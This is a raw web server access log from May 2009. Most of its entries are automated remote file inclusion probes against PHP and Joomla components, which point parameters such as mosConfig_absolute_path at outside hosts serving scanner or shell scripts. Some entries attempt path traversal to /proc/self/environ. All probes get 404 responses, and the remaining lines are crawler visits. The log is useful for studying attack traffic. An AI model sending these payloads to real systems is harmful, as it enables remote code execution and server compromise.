208.64.202.135 - - [13/May/2009:22:06:30 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:30 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:30 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:30 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:31 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:32 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:33 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:22:06:33 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mjswimgear.dk/joomla//logs/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.44.32 - - [13/May/2009:22:06:33 -0500] "GET /logs/access_log.1232236800//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
66.249.67.180 - - [13/May/2009:22:11:06 -0500] "GET /logs/access_log.1209254400 HTTP/1.1" 200 930 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.44.32 - - [13/May/2009:22:12:53 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
190.144.44.36 - - [13/May/2009:22:12:57 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:22:12:58 -0500] "GET /logs/access_log.1230249600/inc/cmses/aedatingCMS.php?dir[inc]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:22:12:58 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
77.221.130.2 - - [13/May/2009:22:13:00 -0500] "GET /logs/access_log.1238284800//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:00 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:00 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
222.236.44.32 - - [13/May/2009:22:13:00 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
77.221.130.2 - - [13/May/2009:22:13:16 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:16 -0500] "GET /logs/access_log.1238544000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:34 -0500] "GET /logs/access_log.1232236800//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:41 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:41 -0500] "GET /logs/access_log.1231545600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:22:13:41 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
222.236.44.32 - - [13/May/2009:22:14:14 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
222.236.44.32 - - [13/May/2009:22:14:16 -0500] "GET /logs/access_log.1233187200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
222.236.44.32 - - [13/May/2009:22:14:16 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
66.249.67.180 - - [13/May/2009:22:16:23 -0500] "GET /logs/access_log.1138320000 HTTP/1.1" 200 1681 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.18.58 - - [13/May/2009:22:16:47 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:22:16:47 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:22:16:47 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:22:17:00 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:22:17:00 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:22:17:00 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
217.18.76.16 - - [13/May/2009:22:18:29 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:22:18:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:22:19:10 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:22:19:10 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
148.243.72.112 - - [13/May/2009:22:19:26 -0500] "GET //guestbook1//admin.php?include_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
148.243.72.112 - - [13/May/2009:22:19:26 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
148.243.72.112 - - [13/May/2009:22:19:26 -0500] "GET /logs//guestbook1//admin.php?include_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.44.32 - - [13/May/2009:22:19:42 -0500] "GET /logs/access_log.1233187200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
222.236.44.32 - - [13/May/2009:22:19:43 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
222.236.44.32 - - [13/May/2009:22:19:44 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:22:19:59 -0500] "GET /logs/access_log.1239062400//guestbook1//admin.php?include_path=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
110.45.144.107 - - [13/May/2009:22:20:48 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.144.107 - - [13/May/2009:22:20:48 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
110.45.144.107 - - [13/May/2009:22:20:48 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.90.72.88 - - [13/May/2009:22:20:49 -0500] "GET /logs/index.php?_REQUEST=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [13/May/2009:22:20:50 -0500] "GET /index.php?_REQUEST=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:22:20:51 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:22:20:51 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
216.117.191.71 - - [13/May/2009:22:21:14 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:22:21:14 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.65"
87.106.135.14 - - [13/May/2009:22:21:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:22:21:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:22:21:41 -0500] "GET /logs/access_log.1131753600 HTTP/1.1" 200 801 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.150.79.146 - - [13/May/2009:22:21:43 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:21:43 -0500] "GET //guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:21:43 -0500] "GET /logs//guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 334 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 339 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 334 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:22:21:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""XXXXXX"
218.150.79.146 - - [13/May/2009:22:22:20 -0500] "GET //guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:22:20 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:22:20 -0500] "GET /logs//guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:22:23:02 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:22:23:07 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:23:09 -0500] "GET /logs/access_log.1239062400//guestbook1//admin.php?include_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:22:23:10 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
116.50.163.164 - - [13/May/2009:22:23:41 -0500] "GET /lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
116.50.163.164 - - [13/May/2009:22:23:41 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
110.45.144.107 - - [13/May/2009:22:23:57 -0500] "GET /logs/access_log.1231200000//modules/vwar/admin/admin.php?vwar_root=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:22:26:57 -0500] "GET /logs/access_log.1120003200 HTTP/1.1" 200 4153 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.150.79.146 - - [13/May/2009:22:27:26 -0500] "GET //modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:28 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:28 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:29 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:47 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:47 -0500] "GET //modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:48 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:27:49 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:22:28:07 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:22:28:11 -0500] "GET /logs/access_log.1239321600//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:22:28:12 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.208.137 - - [13/May/2009:22:28:20 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [13/May/2009:22:28:21 -0500] "GET /logs/access_log.1231977600 HTTP/1.1" 200 112712 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.18.76.16 - - [13/May/2009:22:28:40 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:22:28:40 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /logs/scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 324 "-""XXXXXX"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /logs/scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 329 "-""XXXXXX"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""XXXXXX"
173.23.160.236 - - [13/May/2009:22:28:50 -0500] "GET /logs/scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""XXXXXX"
218.150.79.146 - - [13/May/2009:22:28:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:28:54 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:28:54 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [13/May/2009:22:28:54 -0500] "GET //modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.106.135.14 - - [13/May/2009:22:29:37 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:22:29:38 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
65.55.208.138 - - [13/May/2009:22:30:52 -0500] "GET /logs/access_log.1164758400 HTTP/1.1" 200 1179 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [13/May/2009:22:30:54 -0500] "GET /logs/access_log.1194220800 HTTP/1.1" 200 6304 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [13/May/2009:22:30:58 -0500] "GET /logs/access_log.1187740800 HTTP/1.1" 200 833 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [13/May/2009:22:31:12 -0500] "GET /logs/access_log.1109721600 HTTP/1.1" 200 2446 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.117.191.71 - - [13/May/2009:22:31:12 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
